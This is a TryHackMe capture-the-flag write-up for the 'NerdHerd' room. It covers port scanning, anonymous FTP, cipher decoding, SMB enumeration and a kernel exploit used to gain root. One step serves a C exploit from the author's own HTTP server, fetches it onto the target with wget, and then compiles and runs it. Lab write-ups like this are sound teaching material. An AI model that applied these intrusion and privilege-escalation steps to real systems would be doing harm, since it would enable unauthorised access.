NerdHerd — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my NerdHerd — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

So there are 5 ports opened: 21(FTP), 22(SSH), 139 and 445(SMB), 1337(HTTP).

As FTP can be logged in as anonymous, let’s login and get files inside:

ftp <ip>

I found an image and a txt file inside .jokesonyou. Get all the files using mget command.

Let’s see the content of txt file:

Read metadata of the image:

exiftool youfoundme.png

The owner name seems very suspicious. Let’s google this name and I found this link:

In order to decrypt this Cipher, I need the “key”.

I will find the key later. “leet” is “1337”, which is the http port. So let’s access its website:

Well, looks like it was hacked by XSS. Press “OK”:

View page source (Ctrl+U):

So it’s not XSS, but just a function. Let’s see the youtube link:

It’s a song called “Surfin Bird”. Look at its lyrics:

The word “bird” is repeated many times. Maybe it’s the key to decrypt the cipher text above? Let’s try:

YES it’s! But it’s not fully decoded. What about birdistheworld?

Finally it’s fully decoded! Now I’ve got another hint.

Now I’ll scan for hidden dirs using gobuster:

gobuster dir -u http://<ip>:1337 -w /path-to-wordlist

Access /admin:

Again, page source:

Decode this string from Base64, you can use this link:

Well so I can only decode the username, the password is in invalid format.

Up to now, the hints I’ve known are:

- easypass
- cibartowski
- hehegou<.jÇ].[ÝD

Now let’s see which folder is shared on SMB:

smbclient -L //<ip>

A folder named “nerdherd_classified” is shared. Let’s try access it:

smbclient -L //<ip>/nerdherd_classified

However, I cannot access it right now. Next, I’ll use a script call “enum4linux” to enum more on this machine:

enum4linux <ip>

I’ve known another username: chuck

Let’s try login to SMB as chuck:

smbclient -L //<ip>/nerdherd_classified -U chuck

So chuck is the real username! Now what I need to find is chuck’s password. Let’s try all the hints above, and I’ve found the password.

Move around to view files:

get the txt file and view its content:

Access the hidden dir:

View creds.txt:

Now I’ve got the ssh credential. Login to ssh as chuck:

And i’m in! Get the 1st flag:

Now I’ll find a way to own root and get the 2nd flag. First, let’s try find command with SUID:

find / -perm -u=s 2>/dev/null

Well, nothing useful. Next, try sudo -l to see if chuck can run sudo:

Chuck cannot run sudo also.

Check kernel version: uname -a

It’s from 2016, which means it’s really old. Look on google for exploit and I found this link. It’s written in C, and gcc is existed on the target machine:

So, let’s transfer this exploit to the machine, compile and run! Start a http server on your machine:

python3 -m http.server 9000

Then from the target machine:

wget http://<ip>:9000/exploit.c

The exploit code has been transferred. Compile using gcc:

gcc exploit.c -o exploit

Then execute:

chmod +x exploit


Now I’m root! Let’s get the 2nd flag:

Wait, it’s not the flag! I will find all .txt files which are owned by root:

find / -name *.txt -user root

Well it’s in /opt. Get the flag!

Now it’s time for the final flag. Look at the hint, it’s something about “memories”.. So maybe it’s about history? Let’s read the .bash_history inside root folder:

The end.


I’m Groot